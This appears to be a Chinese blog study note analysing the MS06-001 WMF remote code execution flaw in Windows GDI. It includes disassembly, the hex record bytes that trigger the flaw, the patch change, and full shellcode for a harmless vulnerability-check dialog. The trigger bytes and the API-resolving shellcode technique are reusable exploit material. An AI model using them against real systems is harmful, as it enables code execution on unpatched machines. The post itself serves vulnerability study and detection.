MS06001 图形呈现引擎(WMF)漏洞分析学习手记

图形呈现引擎中由于其处理 Windows 图元文件 (WMF) 图像的方式而存在一个远程执行代码漏洞。据FlashSky所言是MS早期在处理OLE而在WMF(没有考虑安全)中定义的功能。漏洞因0day方式传播而导致漏洞被曝光。Win2000、XPsp1、XPsp2代码略有不同,如下代码是XPsp1的。 一、漏洞分析: 漏洞出现的问题是在PlayMetaFile函数中,函数调用关系如下: Gdi32.dll!PlayMetaFile PlayMetaFileRecord Escape SetAbortProc 在 PlayMetaFileRecord函数中将比较wmf格式中的相关Record结构,如果该标记不为0X49和后续的标记不为0X0f则转向跳到 ESCAPE函数上,ESCAPE会允许设置为wmf一个段当作代码,并将这个地址传送给sETaBORTpROC,在sETaBORTpROC函数返回 的时候,WMF文件中的代码将会被执行。 在WMF文件头中增加如下Record可以激活漏洞:11 00 00 00 26 06 09 00 16 00 .TEXT:77c4b65c           PUSH  [EBP+UfLAGS]            ; CASE 0X26 .TEXT:77c4b65f           PUSH  EBX .TEXT:77c4b660           CALL      ; pLAYiNTOamETAFILE(X,X) .TEXT:77c4b665           CMP   EAX, EDI .TEXT:77c4b667           MOV   [EBP+VAR_4], EAX .TEXT:77c4b66a           JNZ   LOC_77c4b424 .TEXT:77c4b670           MOV   AX, [EBX+6]        ;AX=09=sETaBORTpROC .TEXT:77c4b674           CMP   AX, 0fH .TEXT:77c4b678           JNZ   LOC_77c5fc0a ... .TEXT:77c61062           SUB   EDI, 6            ;将9进行减去三次,如果在减6为0 .TEXT:77c61065           JZ    SHORT LOC_77c61090    ;则跳到sETaBORTpROC函数 ... .TEXT:77c61090           PUSH  [EBP+ARG_c]             ; abortproc .TEXT:77c61093           PUSH  [EBP+ARG_0]             ; hdc .TEXT:77c61096           CALL           ; sETaBORTpROC函数将返回1 ... .TEXT:77c604c8           MOV   EAX, [EAX+14H]        ;代码地址传入eax .TEXT:77c604cb           CMP   EAX, ECX            ;如果该地址为空跳走 .TEXT:77c604cd           JZ    LOC_77c4b286 .TEXT:77c604d3           PUSH  ECX .TEXT:77c604d4           PUSH  EDI .TEXT:77c604d5           CALL  EAX            ;执行wmf文件中的代码! .TEXT:77c604d7           TEST  EAX, EAX .TEXT:77c604d9           JZ    LOC_77c5c87b .TEXT:77c604df           JMP   LOC_77c4b286   补丁改动: MS修补这个漏洞采用直接比较是否为0x09,如果是则不走入Escape函数,直接返回。 7F032200    837C24 04 09          CMP DWORD PTR SS:[ESP+4],9   ;直接比较标记是否为09 7F032205    74 08                 JE SHORT GDI32.7F03220F 7F032207    837C24 04 0F          CMP DWORD PTR SS:[ESP+4],0F 7F03220C    74 01                 JE SHORT GDI32.7F03220F 7F03220E    40                    INC EAX 7F03220F    C2 0400               RETN 4   二、检测Shellcode: 为检测主机是否存在漏洞,构造了一个WMF文件,发现现有的ShellCode无不是为了入侵(add user&downexec),流传的那个0day会崩掉Explorer.exe,于是自己写了一个简易弹出提醒对话框的Shellcode,代码如下: __asm { pushad sub esp, 100; mov ebp,esp; mov eax,fs:0x30 mov eax,[eax+0x0c] mov esi,[eax+0x1c] lodsd mov edi,[eax+0x08] mov eax, [edi+3Ch] mov edx,[edi+eax+78h] add edx,edi mov ecx,[edx+18h] mov ebx,[edx+20h] add ebx,edi sa: dec ecx mov esi,[ebx+ecx*4] add esi,edi mov eax,0x50746547 cmp [esi],    eax jne sa mov eax,0x41636f72 cmp [esi+4],eax jne sa mov ebx,[edx+24h] add ebx,edi mov cx,[ebx+ecx*2] mov ebx,[edx+1Ch] add ebx,edi mov eax,[ebx+ecx*4] add eax,edi mov [ebp+76], eax push 0x0 push dword ptr 0x41797261 push dword ptr 0x7262694c push dword ptr 0x64616f4c push esp push edi call [ebp+76] mov [ebp+80],  eax push dword ptr 0x00003233 push dword ptr 0x72657375 push esp call [ebp+80]    ;LoadLibraryA mov edi,eax push dword ptr 0x0041786F push dword ptr 0x42656761 push dword ptr 0x7373654D push esp push edi call [ebp+76] mov [ebp+84],  eax mov byte PTR [ebp-41h],00h mov byte PTR [ebp-40h],00h lea esi,[ebp-41h] mov byte PTR [ebp-19h],46h mov byte PTR [ebp-18h],6fh mov byte PTR [ebp-17h],75h mov byte PTR [ebp-16h],6eh mov byte PTR [ebp-15h],64h mov byte PTR [ebp-14h],20h mov byte PTR [ebp-13h],57h mov byte PTR [ebp-12h],4dh mov byte PTR [ebp-11h],46h mov byte PTR [ebp-10h],20h mov byte PTR [ebp-0fh],76h mov byte PTR [ebp-0eh],75h mov byte PTR [ebp-0dh],6ch mov byte PTR [ebp-0ch],6eh mov byte PTR [ebp-0bh],75h mov byte PTR [ebp-0ah],72h mov byte PTR [ebp-09h],61h mov byte PTR [ebp-08h],62h mov byte PTR [ebp-07h],69h mov byte PTR [ebp-06h],6ch mov byte PTR [ebp-05h],69h mov byte PTR [ebp-04h],74h mov byte PTR [ebp-03h],79h mov byte PTR [ebp-02h],21h mov byte PTR [ebp-01h],00h lea edi,[ebp-19h] push 0x30 push esi push edi push 0 call [ebp+84] add esp,136 popad retn } 利用这个Shellcode构造了一个测试的wmf文件(320字节),有漏洞主机预览此附件会弹出发现风险的提示窗口。   感谢: Sowhat、FlashSky、tombkeeper,没有你们的指点便没有这篇文章。
posted @ 2012-07-15 22:54  adodo1  Views(114)  Comments(0Edit  收藏  举报